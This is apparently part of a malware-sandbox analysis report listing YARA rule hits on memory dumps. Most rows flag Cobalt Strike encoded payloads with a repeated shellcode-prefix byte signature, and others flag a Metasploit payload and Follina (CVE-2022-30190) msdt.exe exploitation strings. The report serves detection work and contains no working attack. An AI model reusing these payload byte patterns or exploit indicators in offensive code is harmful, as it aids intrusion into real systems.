Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20d68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x228b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499473983.0000000006E97000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1ee8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp	Cobaltbaltstrike_RAW_Payload_https_stager_x86	Detects CobaltStrike payloads	Avast Threat Intel Team	0x0:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000019.00000003.500155514.0000000006E1B000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1bd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499623622.0000000006E7E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x998:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508459967.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1500:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568748602.0000000006E40000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x7d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568710134.0000000006E30000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x368:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507100056.00000000060F1000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1210:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5640:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499889442.0000000006E4D000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x880:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3cb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506175810.00000000062EE000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2fc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5470:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7928:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9de0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc298:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe750:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10c08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x130c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15588:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17a50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19f18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c3e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e8b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20d90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23268:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25740:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27c28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a110:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c5f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2eae0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508628056.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xee8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x47d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6450:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x80c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9d40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb9b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd630:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf2b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10f40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12bc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x164d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18170:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19e08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1baa0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d738:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f3d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21078:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22d20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x249c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499641627.0000000006E7A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1520:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499824941.0000000006E5D000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xdc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506705393.000000000618E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1458:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3740:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5a28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7d10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9ff8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc2f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe5e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x108e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12bd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14ee0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x171e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x194f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b7f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1db10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1fe28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22140:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24458:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26770:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28a98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2adc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d0e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501596100.0000000006A80000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x11c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3fd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6dd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9be0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc9f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf810:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12628:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15440:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18258:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b080:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1dea8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20cd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23af8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26920:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29748:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c580:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2f3b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x321f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35028:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x37e60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3ac98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501243619.0000000006B54000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1000:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3ed8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6db0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9c98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcb80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfa68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12950:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15838:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b618:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e510:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21408:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24300:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x271f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a100:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500112961.0000000006E27000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2b78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499962160.0000000006E3E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x27d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500328316.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xc90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568738886.0000000006E3C000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x13a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509561363.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x26ec8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28800:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a138:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ba70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d3a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ecf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30638:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31f80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507377946.0000000006041000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4b60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6c98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8dd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xaf08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd040:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf178:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x112c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13408:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15550:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17698:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x197e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b928:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1da80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1fbd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21d30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23e88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25fe0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28148:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568792297.0000000006E50000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xcb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x2338:$a: PCWDiagnostic 0x22d0:$sa1: msdt.exe 0x230c:$sa1: msdt.exe 0x2726:$sa1: msdt.exe 0x23de:$sb3: IT_BrowseForFile=
00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000019.00000003.499598965.0000000006E84000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x12b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.504952600.000000000646C000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3228:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5900:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7fe8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa6d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcdb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf4a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11b98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14290:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16988:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19080:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b778:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1de80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20588:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22c90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27aa0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a1b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c8d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2efe8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500604850.0000000006CB9000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x9f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3ac8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499944069.0000000006E41000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2bf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.504750760.00000000064EB000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x11e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3978:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6110:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x88a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb040:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd7e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xff90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12738:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14ee0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17698:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19e50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c608:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1edc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21588:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23d50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26518:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28ce0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b4a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2dc80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30458:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32c30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.502123395.00000000068FF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1058:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499912534.0000000006E47000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500175997.0000000006E14000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2438:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506567409.0000000006230000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x950:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x50e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x74a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9870:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbc48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe020:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x103f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x127d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14ba8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16f80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19358:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b740:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1db28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ff10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x222f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x246e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26ad8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28ed0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b2c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d6c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
